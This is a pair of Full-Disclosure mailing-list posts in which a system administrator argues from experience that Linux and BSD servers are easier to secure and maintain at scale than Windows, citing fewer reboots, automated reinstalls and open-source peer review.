> I for one, DO have experience in both Windows and Unix system administration, and > everyone of our internet facing machines is running Linux. Why? Because for me > they are easier to secure. I can turn off any services that I don't need, I have a > fully-functional firewall on every box, and I don't have to reboot once a month to > stay secure(all updates are currently automated, only kernel vulns need a reboot). >From my experiance, we reboot our Windows servers daily or more often just to keep them running. (They are very busy) It's a given that we have to reboot when doing updates. We don't usually have to reboot to do updates with Linux or *BSD, unless we replace the kernel or libc, which is much more rare. (ok, Linux kernel has been bad lately ;-) Basically, we run a bunch of load balanced Linux boxes and they don't get rebooted much, except that we've designed and implemented a system to install them automatically, so we reboot them for security updates because it's easier (re-installs everything that is different), but then they basically reinstall themselves. It's simple, we don't have the unique binary registry to deal with, just the config files that are common to all similar servers. This is not possible with Windows as far as I know. (I know there's some third party stuff that might make it work, but it's $$$ and probably second rate software) On our Windows side, we have two servers to handle each group of users (websites). Our load balancers failover to one or the other. Each of these handles a max of 1000 domains. The Linux servers have over 100,000 domains each and balance among a lot of servers. This is not possible with Windows (maybe by paying a *lot* of money it is, I don't know) We have not figured out how to make a Windows box install and come up serving web/mail with no human intervention, but we do that with all of our Linux boxes. When we lose a hard drive on a blade server, we replace it and turn it on, it installs and comes up doing mail/web or whatever. We also do not have any Windows boxes directly facing the Internet, it's too dangerous. They're all hidden behind firewalls, etc. We have hundreds of Linux and FreeBSD boxes directly on the 'net though. It's a pain to keep them safe, but it's not hard compared to Windows. Sorry, but the MS system is not secure and not easy to secure or administer on a large scale. I prefer Linux and don't particularly like MS, but I use whatever makes sense. I'm not a "fanboy" for anything. Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"
My thinking and experience shows that in the real world, Linux, OSX, etc. is more secure. Some of that is by obscurity, which isn't real security, but does work in the real world. Most of it is due to peer review. Having said that, when you cannot look at the source code, it is really obscure. When a problem is found in Open/Free software, many people look into it and often when the exploit is announced, a patch is included (which may or may not fix the problem). Because it is openly displayed with source code, many people look at it and it seems to get fixed quite quickly. "Closed source" companies, for the most part seem to take a lot longer in fixing things (some exceptions) and they do not have the same number of people looking over the code. One major thing with UNIX-like systems is that things are not so closely tied together as in Windows. Sure, you have the kernel and libc that are realy tied, but you don't have 100 of them that will break multiple things when you update one. I think this is one of the major problems with Windows, it has way too many dependancies. A simple browser update is like updating libc in UNIX (which is nasty). I can't even imagine trying to write a patch for a system like that, I really hope that MS fixes their security issues or something else that is more easily maintained takes over. Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
